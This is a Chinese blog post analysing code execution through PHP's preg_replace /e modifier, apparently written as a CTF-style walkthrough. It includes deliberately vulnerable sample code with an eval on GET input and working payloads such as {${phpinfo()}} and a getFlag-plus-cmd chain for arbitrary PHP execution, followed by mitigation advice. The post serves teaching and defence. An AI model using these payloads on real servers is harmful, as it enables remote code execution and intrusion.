深入研究 preg_replace /e 模式下的代码执行

于 2025-03-25 16:52:27 发布
阅读量932 收藏 8
点赞数 15
分类专栏: 渗透攻击 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/LIUaiCHEN_/article/details/146504965
版权

1. 引言

在 PHP 7.3 之前,preg_replace 使用 /e(执行)模式时,可能导致代码执行漏洞。其中包括 preg_replace 函数的执行过程分析、正则表达式分析、漏洞触发分析

2. 代码案例分析

<?php
function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}

foreach($_GET as $re => $str) {
    echo complex($re, $str) . "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

漏洞点分析

  1. preg_replace 使用了 /e 模式,会执行替换字符串作为 PHP 代码。

  2. 第二个参数 'strtolower("\\1")' 直接调用了 strtolower(),并将 \1 作为参数。

  3. \1 在正则表达式中是匹配的第一个子模式,即用户输入。

如果传入的 $re$str 经过特定构造,就可以执行任意 PHP 代码。

3. 第一个坑:\1 的作用

eval('strtolower("\\1")');

\1 在 PHP 正则表达式中代表的是第一个匹配的子模式(即括号 () 内的内容)。

示例 payload:

?.*={${phpinfo()}}

preg_replace('/(' . $re . ')/ei', 'strtolower("\\1")', $str); 这句代码中,\1 匹配的是 phpinfo(),所以最终会执行 phpinfo()

问题点

但在 GET 传参的情况下,?.* 不是一个合法的 PHP 变量名,会被 PHP 替换 _,导致匹配失败。

4. 第二个坑:匹配所有字符的正则表达式

为了绕过 PHP 变量名限制,我们可以使用 \S* 进行匹配。

?\S*={${phpinfo()}}

为什么 \S* 能够匹配?

  1. \s 表示空白字符,如空格、换行、制表符。

  2. \S 表示非空白字符。

  3. . 默认不匹配换行,但 [\s\S] 可以匹配所有字符。

所以,我们使用 \S* 作为匹配规则,可以成功匹配 {${phpinfo()}},从而触发 phpinfo()

5. 第三个坑:PHP 可变变量解析

{${phpinfo()}}

在 PHP 中,双引号可以解析变量,而单引号不会解析。

  • {${phpinfo()}} 中的 phpinfo() 会先执行,返回 1

  • 变成 {${1}},即 {1},最终结果为 1

代码示例

var_dump(phpinfo()); // 结果:true
var_dump(strtolower(phpinfo())); // 结果:'1'
var_dump(preg_replace('/(.*)/ie','1','${phpinfo()}'));// 结果:'11'
var_dump(preg_replace('/(.*)/ie','strtolower("\\1")','{${phpinfo()}}'));// 结果:''

最终执行的 preg_replace 代码等价于:

strtolower("{null}") // 结果为空字符串

6. 直接调用 getFlag() 进行代码执行

payload:
?\S*={${@getFlag()}}&cmd=phpinfo();

这样,我们可以利用 getFlag() 函数,执行 eval($_GET['cmd']),从而执行任意 PHP 代码。

7. 结论

  1. preg_replace /e 模式可以执行 PHP 代码,因此在 PHP 7.3 之前的版本存在严重安全风险。

  2. 由于 PHP 变量名限制,直接使用 ?.* 可能导致匹配失败,需要使用 \S* 进行匹配。

  3. 利用 {${phpinfo()}} 形式,可以通过 PHP 可变变量解析执行任意代码。

  4. 可通过 getFlag() 函数,进一步执行任意命令。

安全建议

  • 不要 在 PHP 代码中使用 preg_replace /e,使用 preg_replace_callback() 替代。

  • 升级 PHP 到 7.3+,完全移除 /e 模式支持。

  • 严格过滤用户输入,避免代码执行漏洞。

参考资料

php preg replace e,关于 preg_replace 危险的“/e”修饰符
weixin_33980343的博客
03-10 1459
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。而函数中的 /e 这个修饰符的意思就是让 正则替换之后将 replacement 参数当作 PHP 代码。该用法常在 PHP webshell 中出现。preg_replace ( mixed pattern, mixed replacem...
preg_replace漏洞e模式函数执行
qq_66013948的博客
03-09 1205
​ 这里我自己的理解是,只要一个正则表达式被一个一个括号包围,那么它就将被存放到一个临时缓冲区中,并且,如果存在多个正则表达式被括号包围,那么,就会从左到右依次存放在这个临时缓冲区中,另外,这个临时缓冲区是从1号开始的,也就是说,在正则表达式中,\1有着自己的含义,也就是访问这个缓冲区的第一个表达式,而两个\也是因为一个\要对另一个\进行转义。{1},这玩意能正常执行出来,由于我们没有给1赋值,他会给个警告,但是没问题,不影响我们的语句,所以这个时候我们的rce就实现了。,此时我们呢再执行这个。
慎用preg_replace危险的/e修饰符(一句话后门常用)
12-18
preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) 特别说明: /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。 举例: 复制代码 代码如下: <?php preg_replace (“/(</?)(w+)([
PHP安全之慎用preg_replace的/e修饰符
weixin_34318956的博客
06-26 204
PHP以其易用性和可移植性正被广泛应用于WEB开发。然而,在我们使用的过程中,也要十分小心,从随处可见的XSS(新浪微博发送大量垃圾信息事件)到前段时间爆出来的Hash冲突的DDOS攻击,最近,wooyun上面发布了一个关于ThinkPHP框架的漏洞(最新版已经修复),以前也是我用过的第一个框架,昨晚花时间重现了一下,查阅了下程序的原理。本文主要来重现该漏洞,然后分析代码,给出漏洞的原因,用这个漏...
php新版本号废弃 preg_replace /e 修饰符
weixin_33851604的博客
05-11 207
近期serverphp版本号升级到了 5.6  发现出了非常多警告   preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead 一開始没注意。后来发现 非常多这种警告,于是网上查了下 发现 php5.5版本号以上 就废弃了  preg_replace   函数中 /e 这个修饰...
preg_replace在/e模式下的代码执行
最新发布
yxr520yj的博客
12-25 243
意为在 “this is a test” 字符串中找到 “test”,并将其替换为通过$_GET["a"]获取的。被认为是危险的,因为它允许在替换过程中执行任意的 PHP 代码,从而可能导致安全漏洞。:是一个非常关键的选项,表示 PHP 会在替换时执行替换内容中的 PHP 代码(通过。:这是要进行搜索和替换的原始字符串。在这个例子中,原始字符串是。:这是正则表达式模式,用于匹配字符串中的特定部分。:这是用来替换匹配部分的内容。将作为替换内容,并且 PHP 会执行。中的 PHP 代码。
深入研究PHP中的preg_replace代码执行
10-18
通过示例代码深入研究了在使用/e模式下的代码执行问题。在/e模式下,preg_replace函数不仅可以进行字符串的替换操作,还可以执行替换字符串中的PHP代码。这种功能在某些场景下非常有用,但同时也很容易被滥用造成...
BUUCTF:[BJDCTF2020]ZJCTF,不过如此 && 攻防世界web之ics-05 -- -preg_replace + /e 的任意代码执行漏洞
Zero_Adam的博客
02-13 407
不足: 在文件包含那里卡住了,想着flag.php还是next.php10多分钟后才想到可以用filter协议来读么,,,等一会看看能不能用data协议来读去??? 这个可以的:index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php 看到正则+str_replace,+ e 修正符,想到的是RCE!?!!。 知识点:/e模式preg_repl
[BJDCTF2020]ZJCTF,不过如此(php伪协议,data伪协议,preg_replace /e漏洞)
weixin_44110537的博客
10-04 571
伪协议常用在文件包含漏洞中. 常见的文件包含函数有: include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile. 具体的函数功能可以参考. 伪协议的学习 通过data协议构造 data://text/plain,I have a dream 通过php协议构造 php://filter/convert.base64-encode/resource=ne.
PHP代码审计归纳总结
qq_45655564的博客
07-06 1048
变量覆盖 extract() 该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。条件:若有EXTR_SKIP则不行。 <?php $a = "Original"; $my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse"); extract($my_array); echo "\$a = $a; \$b = $b; \$c = $c"; ?> # 结果:
preg_replace \e模式代码执行
banliyaoguai的博客
08-16 357
preg_replace 使用了 /e 模式,导致了代码可以被执行,php7.3 版本之前 preg_replace使用/E模式,都会导致代码执行preg_replace 在匹配到正则符号后就会被替换字符串,这时 上面例子中'strtolower("\\1")'代码会被执行。php中有一个可变变量的概念,在PHP中被双引号包裹的字符串可以当作变量解析,也就是进行代码执行,下面执行的函数中包含的是双引号,所以可以解析变量。'strtolower("\\1")'里面的\\1的意思就是将\1转义后的显示,
preg_replace的/e修饰符妙用与慎用
senlin1202的博客
03-04 3057
preg_replace — 执行正则表达式的搜索和替换 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit ] ) 在 subject 中搜索 pattern 模式的匹配项并替换为 replacement 。如果指定了 limit ,则仅替换 limit 个匹配,如果省略
关于preg_replace \e的代码执行
m0_64815693的博客
04-23 1938
关于preg_replace \e的代码执行
深入研究preg_replace \e模式下的代码执行
paidx0
08-21 3370
深入研究preg_replace代码执行 下面将深入研究 preg_replace /e 模式下的代码执行问题, 其中包括 preg_replace 函数的执行过程分析、正则表达式分析、漏洞触发分析,当中的坑非常非常多,相信看完你也能学到很多 案例分析 <?php function complex($re, $str) { return preg_replace( '/(' . $re . ')/ei', 'strtolower("\\1")',
preg_replace() /e代码执行漏洞
weixin_43749601的博客
01-30 5428
preg_replace() 函数 该函数执行一个正则表达式的搜索和替换。 语法 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。 参数说明: $pattern: 要搜索的模式,可以是字符串或一个字符串数组。 $replacem
ecshop 关于 preg_replace /e 修饰符不安全的几处改动
拾贝壳
06-24 6636
主要集中在 upload/includes/cls_template.php 文件中:   1:line 300 :   原语句:   return preg_replace("/{([^\}\{\n]*)}/e", "\$this->select('\\1');", $source);   修改为:   return preg_replace_callback("/{([^
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值